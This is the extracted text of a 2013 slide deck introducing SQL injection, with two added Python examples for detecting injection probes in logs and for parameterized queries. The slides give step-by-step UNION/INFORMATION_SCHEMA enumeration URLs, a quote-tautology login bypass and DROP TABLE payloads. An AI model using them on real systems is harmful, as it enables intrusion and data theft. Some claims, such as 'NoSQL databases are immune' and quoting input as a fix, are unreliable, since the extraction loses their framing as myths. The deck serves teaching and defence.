A brief Introduction to SQL Injection


  • 7/28/2019 A brief Introduction to SQL Injection

    1/22

    Security Lab, University Putra Malaysia

    23 May 2013

    Sina Manavi

    Contact: http://sinamanavi.blogspot.com/p/about-me.html

    2/22

    Introduction

    Why SQL injection?

    What is needed for it

    What you can do with SQL injection

    What are its pros and cons

    Why we need to know about it, and how we can protect our database from SQL injection attacks

    3/22

    We are all familiar with the SQL language.

    It is one of the technologies that helped turn the static web into a dynamic one.

    SQL is relatively easy to read, a little more difficult to write.

    It works on servers such as Apache, MS Server, etc.

    SQL injection means manipulating SQL tables through unauthorized access.

    4/22 (image-only slide, no text extracted)

    5/22

    SQL injection happens in one of two forms, UI-based or URL-based:

    (1) Injecting into a form, such as the username and password boxes on a login page.

    (2) Injecting into a URL, like http://yourtarget.com/products/list.php?pid=10

    6/22

    Simple example:

    SELECT ID FROM tbl_users WHERE ID = Uid AND pass = pass

    (Uid and pass are the values the user submitted.) If the query returns any row, the current inputs are taken as correct.

    7/22

    www.yourtarget.com/list?id=5

    If you want to view a record from a table through the URL, the id parameter ends up in a query such as:

    SELECT * FROM tbl_users WHERE id=5

    8/22

    INFORMATION_SCHEMA holds the names of every table and column on a site, and its name never changes.

    Table holding all the table names: INFORMATION_SCHEMA.TABLES

    Table holding all the column names: INFORMATION_SCHEMA.COLUMNS

    9/22

    Finding the number of columns:

    www.yourtarget.com/list.php?ID=10+ORDER+BY+1--

    Increase the 1 until you get an error; the last number that worked is the column count.

    Finding the table name:

    www.yourtarget.com/list.php?ID=-1+UNION+SELECT+1,2,3+FROM+INFORMATION_SCHEMA.TABLES--

    And it shows: tbl_user

    To Be continued

    10/22

    Now it's time to find out the column names:

    www.yourtarget.com/list.php?ID=-1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name='tbl_user'--

    The result would be as follows:

    id,username,password

    Column-name finding step:

    www.yourtarget.com/list.php?ID=-1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name='UserAccounts'+AND+column_name>'displayed_column'

    Try column names until you find your target (e.g. username, password, or login).

    11/22

    And finally it's time to see the records:

    www.yourtarget.com/list.php?ID=-1+UNION+SELECT+1,username,3+FROM+UserAccounts

    And:

    www.yourtarget.com/list.php?ID=-1+UNION+SELECT+1,password,3+FROM+UserAccounts

    Username=admin password=123456

    Stupid admin ha ;)
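    The enumeration sequence on slides 9 to 11 (ORDER BY probing, UNION SELECT against INFORMATION_SCHEMA, then pulling columns) leaves a very recognisable trail in the web server's access log. The following script is an added example, not part of the deck: it parses constructed access-log lines (hosts, paths and timestamps are made up; the payloads mirror the ones on the slides), URL-decodes each query parameter and flags the values that match the probe patterns, so a defender can spot the walk through the schema and the client performing it.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (Apache common log format). Hosts, paths and
# timestamps are placeholders; the payloads mirror the ORDER BY / UNION SELECT /
# INFORMATION_SCHEMA probes and the quote-tautology login bypass shown in the deck.
SAMPLE_LOG = """\
203.0.113.7 - - [23/May/2013:10:01:02 +0800] "GET /list.php?ID=10 HTTP/1.1" 200 5120
203.0.113.7 - - [23/May/2013:10:01:09 +0800] "GET /list.php?ID=10+ORDER+BY+1-- HTTP/1.1" 200 5120
203.0.113.7 - - [23/May/2013:10:01:15 +0800] "GET /list.php?ID=10+ORDER+BY+4-- HTTP/1.1" 500 312
203.0.113.7 - - [23/May/2013:10:02:01 +0800] "GET /list.php?ID=-1+UNION+SELECT+1,2,3+FROM+INFORMATION_SCHEMA.TABLES-- HTTP/1.1" 200 4870
203.0.113.7 - - [23/May/2013:10:02:30 +0800] "GET /list.php?ID=-1+UNION+SELECT+1,column_name,3+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+table_name%3D%27tbl_user%27-- HTTP/1.1" 200 4902
198.51.100.4 - - [23/May/2013:10:03:00 +0800] "GET /login.php?user=admin%27+or+%271%27%3D%271&pass=x HTTP/1.1" 302 0
198.51.100.9 - - [23/May/2013:10:04:00 +0800] "GET /products/list.php?pid=10 HTTP/1.1" 200 7000
"""

# Common log format: client, ident, user, [timestamp], "METHOD target HTTP/x", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Signatures are applied to each URL-decoded, lower-cased query parameter value.
SIGNATURES = [
    ("order-by-probe", re.compile(r"\border\s+by\s+\d+")),
    ("union-select", re.compile(r"\bunion\b(\s+all)?\s+select\b")),
    ("schema-enum", re.compile(r"\binformation_schema\b")),
    ("quote-tautology", re.compile(r"'\s*or\s+'[^']*'\s*=\s*'")),
    ("comment-terminator", re.compile(r"(--|#|/\*)\s*$")),
]


def scan_line(line):
    """Return a list of (param, [signature names]) for parameters that match."""
    m = LOG_RE.match(line)
    if not m:
        return []
    query = urlsplit(m.group("target")).query
    findings = []
    # parse_qsl decodes '+' and %XX escapes, so the regexes see the SQL the app saw
    for name, value in parse_qsl(query, keep_blank_values=True):
        value = value.lower()
        hits = [sig for sig, rx in SIGNATURES if rx.search(value)]
        if hits:
            findings.append((name, hits))
    return findings


def scan_log(text):
    """Return one finding dict per (log line, parameter) that trips a signature."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for param, hits in scan_line(line):
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "status": int(m.group("status")),
                "path": urlsplit(m.group("target")).path,
                "param": param,
                "hits": hits,
            })
    return findings


def hits_per_ip(findings):
    """Count findings by client so the host walking the schema stands out."""
    return Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    found = scan_log(SAMPLE_LOG)
    for f in found:
        print(f"{f['ip']} {f['ts']} {f['path']} param={f['param']} "
              f"status={f['status']} hits={','.join(f['hits'])}")
    print("per-IP:", dict(hits_per_ip(found)))
```

    Run on the constructed log, five of the seven requests are flagged and four of them come from the same client within two minutes, with the ORDER BY probe that hit a 500 immediately followed by the INFORMATION_SCHEMA queries. That sequence, not any single request, is the signal worth alerting on; the same regexes also fit a WAF rule or a SIEM query over decoded query strings.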

    12/22

    Now we can alter the records as well, let's rock:

    UPDATE tbl_user
    SET password = SHA2('$password', 256)
    WHERE id = $id

    Or we can insert a new user with the INSERT command.

    13/22

    If user_list contains 1000 records, then the database is overwhelmed, because every JOIN without a join condition multiplies the number of rows:

    SELECT * FROM user_list JOIN user_list JOIN user_list JOIN user_list JOIN user_list JOIN user_list

    14/22

    Insert a new user into tbl_user

    The malicious code can be:

    DROP TABLE tbl_user

    15/22

    How it works:

    SELECT * FROM tbl_users WHERE id = Fname AND pass = pass

    Malicious code (the input Fname' or '1'='1 is pasted straight into the query):

    SELECT * FROM table WHERE id = 'Fname' or '1'='1';
    if (mysql_num_rows($result))
        // do login

    Now the unauthorized user gets access easily and bypasses the authorization.

    16/22

    Security is the developer's job. No database, connector, or framework can prevent SQL injection all the time.

    17/22

    Implement proper error handling. This includes using a single error message for all errors.

    Lock down the database user configuration: specify users, roles and permissions, etc.

    Prefix and append a quote to all user input, even if the data is numeric.
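    To make the login bypass on slide 15 and the fixes on this slide concrete, here is an added example that is not part of the deck. It builds an in-memory SQLite table standing in for tbl_users (the user rows are made up), implements the login check twice, once by string concatenation as on the slide and once with bound parameters, and wraps the safe version in an authenticate() function that returns one generic message for every failure. Hashing with SHA-256 is only to keep the example self-contained; a slow password hash such as bcrypt or argon2 belongs in real code.

```python
import hashlib
import sqlite3

# Constructed in-memory database standing in for the deck's tbl_users; both rows
# are made up. Passwords are stored as SHA-256 hex digests only to keep the
# example self-contained.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tbl_users (ID INTEGER PRIMARY KEY, username TEXT, pass TEXT)")
    conn.executemany(
        "INSERT INTO tbl_users (ID, username, pass) VALUES (?, ?, ?)",
        [(1, "admin", hashlib.sha256(b"correct horse").hexdigest()),
         (2, "alice", hashlib.sha256(b"s3cret").hexdigest())],
    )
    return conn


def login_vulnerable(conn, username, password):
    """Builds the query by string concatenation, as on the 'How it works' slide.
    The input  admin' or '1'='1  turns the WHERE clause into
    username='admin' or '1'='1' AND pass='...'  and logs in without the password."""
    sql = ("SELECT ID FROM tbl_users WHERE username='" + username +
           "' AND pass='" + hashlib.sha256(password.encode()).hexdigest() + "'")
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error:
        return None  # attacker-controlled input can also simply break the query
    # "if it returns any value, the inputs are correct"
    return rows[0][0] if rows else None


def login_safe(conn, username, password):
    """Same check with bound parameters: user input is data, never SQL text,
    so the quote-tautology is compared literally against the username column."""
    digest = hashlib.sha256(password.encode()).hexdigest()
    rows = conn.execute(
        "SELECT ID FROM tbl_users WHERE username=? AND pass=?", (username, digest)
    ).fetchall()
    return rows[0][0] if rows else None


# Slide 17: a single error message for all errors, so the response does not
# reveal whether the username exists, the password was wrong or the query failed.
GENERIC_FAILURE = "Invalid username or password"


def authenticate(conn, username, password):
    """Return (ok, message); every failure path yields the same message."""
    try:
        uid = login_safe(conn, username, password)
    except sqlite3.Error:
        return (False, GENERIC_FAILURE)
    if uid is None:
        return (False, GENERIC_FAILURE)
    return (True, f"welcome user {uid}")


if __name__ == "__main__":
    db = make_db()
    payload = "admin' or '1'='1"
    print("vulnerable, bypass payload ->", login_vulnerable(db, payload, "anything"))
    print("parameterized, same payload ->", login_safe(db, payload, "anything"))
    print("authenticate(alice, wrong)  ->", authenticate(db, "alice", "wrong"))
    print("authenticate(alice, s3cret) ->", authenticate(db, "alice", "s3cret"))
```

    The vulnerable function returns the admin's ID for the tautology payload; the parameterized one returns nothing, because the driver sends the quote and the OR as part of a string value rather than as SQL. Wrapping input in quotes, as the last bullet suggests, does not give that guarantee by itself (the payload above already closes the quote), which is why slide 21 lists "Escaping is the fix" among the myths. The other bullet on this slide applies to the connection the code opens: the account the application connects with should hold only the SELECT it needs on tbl_users, so that even a successful injection cannot run the UPDATE or DROP TABLE shown on earlier slides.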

    18/22 (image-only slide, no text extracted)

    19/22

    Vipin Samar, Oracle vice president of Database Security:

    "Database Firewall is a good first layer of defense for databases but it won't protect you from everything."

    20/22

    Using stored procedures:

    CREATE PROCEDURE SP_show_user(IN U_ID INT)
    BEGIN
        SELECT * FROM Bugs WHERE User_ID = U_ID;
    END

    CALL SP_show_user(54)

    Might be helpful, but still vulnerable.

    21/22

    I don't have to worry anymore

    Escaping is the fix

    More escaping is better

    I can code an escaping function

    Only user input is unsafe

    Stored procs are the fix

    SQL privileges are the fix

    My app doesn't need security

    Frameworks are the fix

    Parameters quote for you

    Parameters are the fix

    Parameters make queries slow

    SQL proxies are the fix

    NoSQL databases are the fix

    22/22

    NoSQL databases are immune to SQL injection.